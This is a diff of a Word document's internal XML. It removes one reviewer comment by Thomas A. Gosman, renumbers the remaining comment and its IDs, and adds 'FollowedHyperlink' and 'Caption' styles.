 <w:comments xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w:comment w:id="0" w:author="Thomas A. Gosman" w:date="2026-06-17T07:21:00Z" w:initials="TG">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Diagram Still Required, Summarised Post Required</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="1" w:author="Thomas A. Gosman" w:date="2026-06-20T11:12:00Z" w:initials="TG">
+  <w:comment w:id="0" w:author="Thomas A. Gosman" w:date="2026-06-20T11:12:00Z" w:initials="TG">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -4289,21 +4635,18 @@
 
 <file path=word/commentsExtended.xml><?xml version="1.0" encoding="utf-8"?>
 <w15:commentsEx xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w15:commentEx w15:paraId="021B784C" w15:done="0"/>
   <w15:commentEx w15:paraId="1A27AC78" w15:done="0"/>
 </w15:commentsEx>
 </file>
 
 <file path=word/commentsExtensible.xml><?xml version="1.0" encoding="utf-8"?>
 <w16cex:commentsExtensible xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cr="http://schemas.microsoft.com/office/comments/2020/reactions" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl cr w16du wp14">
-  <w16cex:commentExtensible w16cex:durableId="760BFA7A" w16cex:dateUtc="2026-06-16T21:21:00Z"/>
   <w16cex:commentExtensible w16cex:durableId="5FA03D0A" w16cex:dateUtc="2026-06-20T01:12:00Z"/>
 </w16cex:commentsExtensible>
 </file>
 
 <file path=word/commentsIds.xml><?xml version="1.0" encoding="utf-8"?>
 <w16cid:commentsIds xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w16cid:commentId w16cid:paraId="021B784C" w16cid:durableId="760BFA7A"/>
   <w16cid:commentId w16cid:paraId="1A27AC78" w16cid:durableId="5FA03D0A"/>
 </w16cid:commentsIds>
 </file>
@@ -6300,6 +6643,37 @@
       <w:color w:val="666666"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="FollowedHyperlink">
+    <w:name w:val="FollowedHyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="001D4E4C"/>
+    <w:rPr>
+      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Caption">
+    <w:name w:val="caption"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="35"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="005E24F1"/>
+    <w:pPr>
+      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="0E2841" w:themeColor="text2"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
